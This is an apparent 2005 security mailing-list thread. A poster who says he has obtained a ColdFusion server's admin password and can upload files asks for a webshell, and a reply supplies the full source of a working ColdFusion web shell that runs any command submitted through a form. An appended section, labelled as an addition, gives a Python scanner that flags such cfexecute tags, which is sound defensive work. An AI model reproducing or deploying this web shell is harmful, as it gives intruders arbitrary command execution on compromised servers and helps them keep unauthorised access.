Open Source and information security mailing list archives
Date: Tue May 10 09:32:57 2005
From: javier.reoyo at interdominios.com (Javier Reoyo)
Subject: coldfusion pentest

Hi fatb,


This is from the SecuriTeam mailing list. Try it.

  ColdFusion Web Shell
------------------------------------------------------------------------


SUMMARY



DETAILS

The following source code will generate a web based shell whenever it is
executed under the ColdFusion environment.

Tool source code:
< html>
< body>

< cfoutput>
< table>
< form method="POST" action="cfexec.cfm">
 < tr>
  < td>Command:</td>
  < td> < input type=text name="cmd" size=50< cfif isdefined("form.cmd")>
value="#form.cmd#" </cfif>> < br></td>
 </tr>
 < tr>
  < td>Options:</td>
  < td> < input type=text name="opts" size=50 < cfif
isdefined("form.opts")> value="#form.opts#" </cfif> >< br> </td>
 </tr>
 < tr>
  < td>Timeout:</td>
  < td>< input type=text name="timeout" size=4 < cfif
isdefined("form.timeout")> value="#form.timeout#" < cfelse> value="5"
</cfif> > </td>
 </tr>
</table>
< input type=submit value="Exec" >
</FORM>

< cfsavecontent variable="myVar">
< cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>
< pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>


ADDITIONAL INFORMATION

The information has been provided by  <mailto:grutz@...gojango.net> Kurt
Grutzmacher.



========================================

----- Original Message ----- 
From: "fatb" <fatb@...urity.zz.ha.cn>
To: <pen-test@...urityfocus.com>
Cc: <full-disclosure@...ts.grok.org.uk>
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest


> Hi all guys
>
> I've succeeded in getting the admin's passwd of the web interface
>
> and I can upload any kinds of files to the server
>
> the server is running coldfusion 4.5 with iis 5.0
>
> but I can not find a coldfusion webshell to continue
>
> anybody could be kind enough to send me a  working coldfusion webshell
>
> thx in advance!


--------------------------------------------------------------------------------


> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
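
For defenders, the telltale feature of the template quoted in this message is a cfexecute tag whose name and arguments attributes are filled from the Form scope. The following is an added example, not part of the original message or the advisory it forwards: a Python heuristic that flags such tags in CFML templates under a web root. The function names, the sample strings and the report.exe path are constructed for illustration.

```python
import os
import re

# Opening cfexecute tag; tolerates whitespace after "<" and line breaks inside the tag.
TAG = re.compile(r"<\s*cfexecute\b([^>]*)>", re.I)
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)')""")
# A #...# expression that reads a request-controlled scope (Form, URL, CGI, Cookie).
REQUEST_SCOPE = re.compile(r"#[^#]*\b(form|url|cgi|cookie)\s*\.\s*\w+[^#]*#", re.I)

def scan_cfml(text):
    """Return (line, severity, attribute, value) tuples, one or more per cfexecute tag."""
    findings = []
    for tag in TAG.finditer(text):
        line = text.count("\n", 0, tag.start()) + 1
        attrs = {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
                 for m in ATTR.finditer(tag.group(1))}
        tainted = [(k, v) for k, v in attrs.items()
                   if k in ("name", "arguments") and REQUEST_SCOPE.search(v)]
        if tainted:
            findings.extend((line, "high", k, v) for k, v in tainted)
        else:
            # Unscoped or indirect variables evade the pattern, so every tag is listed.
            findings.append((line, "review", "name", attrs.get("name", "")))
    return findings

def scan_tree(root):
    """Walk a web root and scan every CFML template; returns {path: findings}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith((".cfm", ".cfml", ".cfc")):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="latin-1") as fh:
                    hits = scan_cfml(fh.read())
                if hits:
                    results[path] = hits
    return results

# Constructed samples: the cfexecute pattern from the message, and a fixed scheduled job.
SHELL_LIKE = '''<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout =
"#Form.timeout#">
</cfexecute>
</cfsavecontent>'''
FIXED_JOB = '<cfexecute name="C:\\jobs\\report.exe" arguments="-daily" timeout="10"></cfexecute>'

if __name__ == "__main__":
    for label, sample in (("shell-like", SHELL_LIKE), ("fixed job", FIXED_JOB)):
        print(label, scan_cfml(sample))
```

A "high" finding means the executed program or its arguments come straight from the request; "review" entries are cfexecute tags with fixed or unrecognised values that still merit a look when they appear in an upload-writable directory.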
